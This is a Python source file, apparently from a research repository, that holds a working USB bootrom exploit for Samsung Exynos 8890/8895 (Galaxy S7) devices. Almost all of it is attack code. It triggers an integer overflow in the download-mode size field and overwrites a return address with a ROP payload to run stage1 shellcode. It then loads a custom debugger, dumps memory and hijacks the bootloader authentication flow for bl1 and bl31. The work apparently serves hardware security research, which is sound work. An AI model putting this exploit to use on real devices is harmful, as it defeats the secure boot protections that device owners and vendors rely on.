Samsung_S7/source/exploit/exploit.py

510 lines
20 KiB
Python
Raw Normal View History

2024-08-02 13:51:35 +00:00
import struct, sys, usb1, libusb1, ctypes, usb, argparse
from keystone import *
from capstone import *
2024-08-02 17:53:33 +00:00
from ghidra_assistant.utils.utils import *
2024-08-05 12:51:04 +00:00
from ghidra_assistant.concrete_device import *
2024-08-05 17:37:13 +00:00
from ghidra_assistant.utils.debugger.debugger_archs.ga_arm64 import GA_arm64_debugger
from qiling.const import QL_ARCH
import os, tqdm, datetime
2024-08-02 13:51:35 +00:00
def p32(x):
return struct.pack("<I", x)
def p8(x):
return struct.pack("<B", x)
def p16(x):
return struct.pack("<H", x)
def p64(x):
return struct.pack("<Q", x)
2024-08-05 17:37:13 +00:00
logger = setup_logger("") #Leave empty to get root logger
logger.setLevel(logging.DEBUG)
2024-08-02 13:51:35 +00:00
BLOCK_SIZE = 512
CHUNK_SIZE = 0xfffe00
2024-08-07 17:13:35 +00:00
MAX_PAYLOAD_SIZE = (BLOCK_SIZE - 10) # 512, - 10 for ready (4), size (4), footer (2)
2024-08-02 13:51:35 +00:00
DL_BUFFER_START = 0x02021800
2024-08-07 17:13:35 +00:00
DL_BUFFER_SIZE = 0x4E800 #max allowed/usable size within the buffer, with end at 0x02070000
2024-08-02 13:51:35 +00:00
BOOTROM_START = 0x0
BOOTROM_SIZE = 0x20000 #128Kb
TARGET_OFFSETS = {
# XFER_BUFFER, RA_PTR, XFER_END_SIZE
2024-08-07 17:13:35 +00:00
"8890": (0x02021800, 0x02020F08, 0x02070000), #0x206ffff on exynos 8890
2024-08-02 13:51:35 +00:00
"8895": (0x02021800, 0x02020F18, 0x02070000)
}
ENDPOINT_BULK_IN = 0x81
ENDPOINT_BULK_OUT = 0x2
2024-08-05 12:51:04 +00:00
ks = Ks(KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN)
cs = Cs(CS_ARCH_ARM64, CS_MODE_LITTLE_ENDIAN)
2024-08-02 13:51:35 +00:00
class ExynosDevice():
2024-08-08 17:46:04 +00:00
"""
Class to exploit a Exynos device (8890/8895) using the USB stack.
"""
2024-08-02 13:51:35 +00:00
def __init__(self, idVendor=0x04e8, idProduct=0x1234):
"""Init with vendor/product IDs"""
self.idVendor = idVendor
self.idProduct = idProduct
self.target = "8890" # TODO auto detect device
self.connect_device()
def connect_device(self):
2024-08-08 17:46:04 +00:00
"""Setup proper connection, and ensure the connection is alive"""
2024-08-02 13:51:35 +00:00
self.context = usb1.USBContext()
2024-08-08 17:46:04 +00:00
2024-08-02 13:51:35 +00:00
while True:
self.handle = self.context.openByVendorIDAndProductID(
vendor_id=self.idVendor,
product_id=self.idProduct,
2024-08-07 17:13:35 +00:00
skip_on_error=False
2024-08-02 13:51:35 +00:00
)
if self.handle == None:
continue
break
2024-08-08 17:46:04 +00:00
try:
self.handle.getDevice().getSerialNumber()
except Exception as e:
if e.value == usb1.libusb1.LIBUSB_ERROR_TIMEOUT or e.value == usb1.libusb1.LIBUSB_ERROR_IO:
print("Device disconnected / not connected. Reconnect USB?")
sys.exit(0)
else:
raise e
2024-08-14 17:46:27 +00:00
# claim usb interface
self.handle.claimInterface(0)
2024-08-08 17:46:04 +00:00
print(f"Connected device! {hex(self.idVendor)} {hex(self.idProduct)}")
2024-08-02 13:51:35 +00:00
2024-08-05 12:51:04 +00:00
def write(self, data):
2024-08-02 13:51:35 +00:00
transferred = ctypes.c_int()
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, data, len(data), ctypes.byref(transferred), 0)
2024-08-05 12:51:04 +00:00
assert(res == 0), "Could not perform bulk transfer"
return res
2024-08-02 13:51:35 +00:00
def send_empty_transfer(self):
transferred = ctypes.c_int()
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, 0, 0, ctypes.byref(transferred), 0)
assert(res == 0)
2024-08-05 12:51:04 +00:00
return transferred.value
2024-08-02 13:51:35 +00:00
def test_bug_2(self):
2024-08-08 17:46:04 +00:00
"""Interger overflow in last packet if reamining size is 1."""
2024-08-02 13:51:35 +00:00
transferred = ctypes.c_int()
bug_payload = p32(0) + p32(0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
assert res == 0
payload = b"\xaa" * 0x200
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
assert res == 0
payload = b"\xaa" * 0x200
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
while True:
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
2024-08-07 17:13:35 +00:00
2024-08-02 13:51:35 +00:00
def test_bug(self):
# Start by sending a valid packet
# Integer overflow in the size field
# unk + size + payload + header
payload = p32(0) + p32(0xFDFDE7FF + 0x1000) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
assert (len(payload) == BLOCK_SIZE)
2024-08-05 12:51:04 +00:00
res = self.write(payload, MAX_PAYLOAD_SIZE)
2024-08-02 13:51:35 +00:00
for i in range(200):
print(hex(self.send_empty_transfer()))
print('Bug probably available')
sys.exit(0)
2024-08-08 17:46:04 +00:00
2024-08-02 13:51:35 +00:00
def send_normal(self, payload):
2024-08-05 12:51:04 +00:00
'''
TODO not working
'''
2024-08-02 13:51:35 +00:00
# construct dl_data
payload = struct.pack("<II", 0, len(payload)) #+ (payload + b"\x00" * 2)
transferred = ctypes.c_int()
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
assert res == 0, "Error sending payload"
pass
def exploit(self, payload: bytes):
2024-08-05 12:51:04 +00:00
'''
2024-08-07 17:13:35 +00:00
Exploit the Exynos device, payload of 502 bytes max. This will send stage1 payload.
2024-08-05 12:51:04 +00:00
'''
2024-08-08 17:46:04 +00:00
assert len(payload) <= MAX_PAYLOAD_SIZE, "Shellcode too big"
2024-08-02 13:51:35 +00:00
current_offset = TARGET_OFFSETS[self.target][0]
2024-08-07 17:13:35 +00:00
xfer_buffer_start = TARGET_OFFSETS[self.target][1] # start of USB transfer buffer
2024-08-02 13:51:35 +00:00
transferred = ctypes.c_int()
2024-08-07 17:13:35 +00:00
size_to_overflow = 0x100000000 - current_offset + xfer_buffer_start + 8 + 6 # max_uint32 - header(8) + data(n) + footer(2)
#size_to_overflow = 0x100000000 - current_offset + xfer_buffer_start + 8
2024-08-02 13:51:35 +00:00
max_payload_size = 0x100000000 - size_to_overflow
2024-08-07 17:13:35 +00:00
ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE) #
2024-08-02 13:51:35 +00:00
2024-08-08 17:46:04 +00:00
# Assert that payload is 502 bytes
2024-08-02 13:51:35 +00:00
# max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1]
# max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200
payload = payload + ((max_payload_size - len(payload)) * b"\x00")
assert len(payload) == max_payload_size, "Invalid payload"
# First send payload to trigger the bug
bug_payload = p32(0) + p32(size_to_overflow) + payload[:MAX_PAYLOAD_SIZE] # dummy packet for triggering the bug
bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
assert res == 0, "Error triggering payload"
assert transferred.value == len(bug_payload), "Invalid transfered size"
current_offset += len(bug_payload) - 8 # Remove header
cnt = 0
while True:
2024-08-07 17:13:35 +00:00
if current_offset + CHUNK_SIZE >= xfer_buffer_start and current_offset < xfer_buffer_start:
2024-08-02 13:51:35 +00:00
break
self.send_empty_transfer()
current_offset += CHUNK_SIZE
cnt += 1
if current_offset > 0x100000000:
current_offset = current_offset - 0x100000000 #reset 32 byte integer
print(f"{cnt} {hex(current_offset)}")
remaining = (TARGET_OFFSETS[self.target][1] - current_offset)
assert remaining != 0, "Invalid remaining, needs to be > 0 in order to overwrite with the last packet"
if remaining > BLOCK_SIZE:
self.send_empty_transfer()
# Send last transfer, TODO who aligns this ROM??
current_offset += ((remaining // BLOCK_SIZE) * BLOCK_SIZE)
cnt += 1
print(f"{cnt} {hex(current_offset)}")
# Build ROP chain.
rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
transferred = ctypes.c_int(0)
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
assert res == 0, "Error sending ROP chain"
2024-08-05 12:51:04 +00:00
def usb_write(self, data):
assert len(data) <= 0x200, "Data too big"
transferred = ctypes.c_int()
2024-08-05 17:37:13 +00:00
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, data, len(data), ctypes.byref(transferred), 300)
assert res == 0, f"Error sending data {res}"
assert transferred.value == len(data), f"Invalid transfered size {transferred.value} != {len(data)}"
2024-08-05 12:51:04 +00:00
return transferred.value
2024-08-02 17:53:33 +00:00
2024-08-05 12:51:04 +00:00
def usb_read(self, size):
transferred = ctypes.c_int()
buf = ctypes.c_buffer(b"", size)
2024-08-05 17:37:13 +00:00
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 300)
assert res == 0, f"Error receiving data {res}"
2024-08-05 12:51:04 +00:00
return buf.raw[:transferred.value]
2024-08-05 17:37:13 +00:00
def setup_concrete_device(self, concrete_device : ConcreteDevice):
#Setup architecture
concrete_device.arch = QL_ARCH.ARM64
concrete_device.ga_debugger_location = 0x2069000 # TODO, not used yet
concrete_device.ga_vbar_location = 0x206d000 + 0x1000
concrete_device.ga_storage_location = 0x206d000
concrete_device.ga_stack_location = 0x206b000
concrete_device.arch_dbg = GA_arm64_debugger(concrete_device.ga_vbar_location, concrete_device.ga_debugger_location, concrete_device.ga_storage_location)
concrete_device.arch_dbg.read = self.usb_read
concrete_device.arch_dbg.write = self.usb_write
#Overwrite all calls to make the concrete target function properly
concrete_device.copy_functions()
2024-08-08 17:46:04 +00:00
def usb_debug(self):
"""
Function to debug USB behaviour. Sends and receives data in continuous flow.
2024-08-08 17:46:04 +00:00
"""
transferred = ctypes.c_int()
# Send some data
count = 0
def _send_data():
transferred.value = 0
p = p32(count) + b"\xaa" * (0x200 - 4)
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, p, len(p), ctypes.byref(transferred), 100)
assert res == 0, f"Error sending data ({res})"
def _recv_data():
transferred.value = 0
buf = ctypes.c_buffer(b"", 0x200)
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, 0x81, buf, len(buf), ctypes.byref(transferred), 100)
assert res == 0, f"Error receiving data ({res})"
hexdump(buf.raw)
# Should have received some bytes
while True:
_send_data()
_recv_data()
count += 1
def dump_memory(self, start: hex=0x0, end: hex=0x0206ffff, write=False):
"""
Dumps memory from the device.
Transfer XFER_BUFFER at 0x02021800, to: 0x02020F08. End of memory at 0x0206ffff.
"""
# NOT WORKING YET
transferred = ctypes.c_int()
dumped = b""
# Read data from memory
for block in tqdm.tqdm(range(start, end, 0x200)):
self.usb_write(p32(block-0x200))
res = self.usb_read(0x200)
dumped += res
if write:
filename = f"dump_{hex(start)}_{hex(end)}_{self.target}_{datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.bin"
with open(filename, "wb") as f:
f.write(dumped)
return dumped
# transferred = ctypes.c_int()
# stack_pointer = 0x02021810
# for block in range(0x2020000, 0x2200000, 0x200):
# stack_pointer += 0x200
# dumped += self.cd.memdump_region(block, 0x200)
def setup_guppy_debugger(self):
"""
Sets up guppy debugger on the device itself.
"""
def _setup_debugger():
'''
Setup the debugger as a concrete device
'''
self.cd = ConcreteDevice(None, False)
self.cd.dev = self.setup_concrete_device(self.cd)
self.cd.test_connection()
def _initial_run_debugger():
"""Write debugger to device and test basic functionality"""
if os.getenv("USER") == "eljakim":
debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
else:
try:
debugger = open("../../dump/debugger.bin", "rb").read()
except Exception as e:
print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
sys.exit(0)
debugger += ((0x2000 - len(debugger)) * b"\x00")
assert len(debugger) == 0x2000, "Invalid debugger size, stage1 requires 0x2000 size"
for block in range(0, len(debugger), 0x200):
self.usb_write(debugger[block:block+0x200])
# time.sleep(.5) # Wait a little bit
assert self.usb_read(0x200) == b"GiAs", "No response from debugger"
# Test basic functionality
self.usb_write(b"PING")
r = self.usb_read(0x200)
assert r == b"PONG", f"Invalid response from device: {r}"
_initial_run_debugger()
_setup_debugger()
2024-08-05 17:37:13 +00:00
def dumb_interact(self, dump_imems=False):
2024-08-05 17:37:13 +00:00
'''
Room for playing around with the debugger
'''
self.cd.arch_dbg.state.auto_sync = False
2024-08-09 10:57:34 +00:00
self.cd.arch_dbg.state.auto_sync_special = False
logger.debug('State after setting up initial debugger')
2024-08-05 17:37:13 +00:00
self.cd.arch_dbg.state.print_ctx()
2024-08-09 10:57:34 +00:00
def relocate_debugger():
# Seems to be cleared upon cache clearing??
if os.getenv("USER") == "eljakim":
debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read()
else:
try:
debugger_reloc = open("../../dump/reloc_debugger.bin", "rb").read()
except Exception as e:
print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
sys.exit(0)
2024-08-09 10:57:34 +00:00
self.cd.memwrite_region(0x020c0000, debugger_reloc)
self.usb_write(b"FLSH") # Flush cache
self.cd.restore_stack_and_jump(0x020c0000)
assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000)
2024-08-09 10:57:34 +00:00
relocate_debugger()
logger.debug('State after relocating debugger')
self.cd.arch_dbg.state.print_ctx()
2024-08-09 10:57:34 +00:00
2024-08-09 20:22:16 +00:00
def memdump_imem():
dumped = b""
for block in range(0x2020000, 0x2070000, 0x200):
# print(hex(block))
dumped += self.cd.memdump_region(block, 0x200)
return dumped
# dump1 = memdump_imem()
2024-08-09 10:57:34 +00:00
# Try loading bl1
bl1 = open("../S7/bl1.bin", "rb").read()
2024-08-14 17:46:27 +00:00
# Using keystone, look for each msr instruction (AARCH64, LE)
# If wanting to modify the binary
# bl1 = bl1[:0x1C23] + b'\xaa' + bl1[0x1C24:]
self.cd.memwrite_region(0x02021800, bl1)
imem1 = memdump_imem()
2024-08-09 10:57:34 +00:00
AUTH_BL1 = 0x00012848
def auth_bl1(lr=0x2069000):
# Load the firmware
self.cd.arch_dbg.state.W0 = 1
self.cd.arch_dbg.state.X1 = 1
self.cd.arch_dbg.state.LR = lr #jump back to debugger when finished
self.cd.restore_stack_and_jump(AUTH_BL1)
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
2024-08-09 20:22:16 +00:00
assert self.cd.arch_dbg.state.X0 == 0, "auth_bl1 returned with error!"
2024-08-09 10:57:34 +00:00
auth_bl1(0x020c0000)
# Dump memory
# imem2 = memdump_imem()
# with open("/tmp/imem1_bad.bin", "wb") as f:
# f.write(imem1)
# with open("/tmp/imem2_bad.bin", "wb") as f:
# f.write(imem2)
2024-08-09 10:57:34 +00:00
# Overwrite jump back to the debugger from functions encountered during jump_bl1
2024-08-09 20:22:16 +00:00
# self.cd.memwrite_region(0x02020108, p32(0x020c0000)) # Hijack some weird function, original 0x00005790
2024-08-14 17:46:27 +00:00
self.cd.memwrite_region(0x020200e8, p32(0x020c0000)) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address)
self.cd.memwrite_region(0x020200dc, p32(0x020c0000))
def hijack_brom_weird():
print(f"LR = {hex(self.cd.arch_dbg.state.LR - 4)} X0 = {hex(self.cd.arch_dbg.state.X0)}")
self.cd.restore_stack_and_jump(0x00000314)
2024-08-09 20:22:16 +00:00
BOOT_BL1 = 0x00019310
def jump_bl1(lr):
self.cd.arch_dbg.state.LR = lr
self.cd.restore_stack_and_jump(BOOT_BL1)
2024-08-09 10:57:34 +00:00
2024-08-09 20:22:16 +00:00
jump_bl1(0x020c0000)
while True:
try:
resp = self.usb_read(0x200)
2024-08-14 17:46:27 +00:00
logging.debug(f'Within jump_bl1. Response: {resp}.')
if self.cd.arch_dbg.state.LR == 0x02022948:
break # ROM will load next stage over USB
hijack_brom_weird()
except:
pass
2024-08-14 17:46:27 +00:00
shellcode = f"""
ldr x0, debugger_addr
blr x0
debugger_addr: .quad 0x020c0000
"""
2024-08-14 17:46:27 +00:00
shellcode = ks.asm(shellcode, as_bytes=True)[0]
self.cd.memwrite_region(0x2021800, shellcode)
2024-08-14 17:46:27 +00:00
self.cd.jump_to(0x2021800)
pass
2024-08-14 17:46:27 +00:00
# load bl31
bl31 = open("../S7/bl31.bin", "rb").read()
# bl31 = bl31[:0x14] + self.cd.arch_dbg.sc.branch_absolute(0x2069000) + bl31[0x24:] # Overwrite jump back to debugger
2024-08-14 17:46:27 +00:00
# # Write bl31 at 0x02021800 and authenticate
self.cd.memwrite_region(0x02021800, bl31)
auth_bl1(0x020c0000)
2024-08-14 17:46:27 +00:00
# Jump to bl31
jump_bl1(0x02021800)
pass
2024-08-14 17:46:27 +00:00
# OLD
2024-08-09 20:22:16 +00:00
2024-08-05 17:37:13 +00:00
def memdump_try():
2024-08-08 17:46:04 +00:00
self.cd.arch_dbg.state.LR = 0x020200e8
self.cd.restore_stack_and_jump(0x02021810)
stack_pointer = 0x02021810
2024-08-05 17:37:13 +00:00
dumped = b""
for block in range(0x2020000, 0x2200000, 0x200):
2024-08-08 17:46:04 +00:00
stack_pointer += 0x200
self.cd.arch_dbg.state.print_ctx()
2024-08-05 17:37:13 +00:00
print(hex(block))
dumped += self.cd.memdump_region(block, 0x200)
2024-08-09 10:57:34 +00:00
2024-08-06 22:20:30 +00:00
2024-08-09 20:22:16 +00:00
2024-08-06 22:20:30 +00:00
# self.cd.restore_stack_and_jump(0x02021810)
#000125b4
# self.cd.arch_dbg.state.LR = 0x2069000 #jump back to debugger when finished
# self.cd.restore_stack_and_jump(0x00012814)
# self.cd.restore_stack_and_jump(0x000125b4)
2024-08-09 10:57:34 +00:00
auth_bl1()
2024-08-06 22:20:30 +00:00
# auth_bl1()
jump_bl1()
assert self.usb_read(0x200) == b"GiAs", "not jumped back to debugger?"
self.cd.arch_dbg.state.print_ctx()
def jump_bl31():
self.cd.arch_dbg.state.LR = 0x2069000
self.cd.restore_stack_and_jump(0x02021810)
bl31 = open("../S7/bl31.bin", "rb").read()
2024-08-08 17:46:04 +00:00
2024-08-06 22:20:30 +00:00
self.cd.memwrite_region(0x02021800, bl31)
jump_bl31()
assert self.usb_read(0x200) == b"GiAs", "not jumped back to debugger?"
self.cd.arch_dbg.state.print_ctx()
2024-08-05 17:37:13 +00:00
2024-08-06 22:20:30 +00:00
# memdump_try()
# auth_bl1()
2024-08-05 17:37:13 +00:00
self.cd.arch_dbg.state.print_ctx()
#authenticate it
pass
2024-08-02 13:51:35 +00:00
if __name__ == "__main__":
arg = argparse.ArgumentParser("Exynos exploit")
2024-08-05 12:51:04 +00:00
arg.add_argument("--debug", action="store_true", help="Debug USB stack", default=False)
2024-08-07 17:13:35 +00:00
args = arg.parse_args()
2024-08-02 13:51:35 +00:00
exynos = ExynosDevice()
2024-08-08 17:46:04 +00:00
if args.debug:
2024-08-08 17:46:04 +00:00
shellcode = open("../dwc3_test/dwc3.bin", "rb").read()
exynos.exploit(shellcode)
exynos.dump_memory(write=True)
# exynos.usb_debug()
sys.exit(0)
2024-08-08 17:46:04 +00:00
stage1 = open("stage1/stage1.bin", "rb").read()
exynos.exploit(stage1)
exynos.setup_guppy_debugger()
exynos.dumb_interact()
2024-08-08 17:46:04 +00:00
sys.exit(0)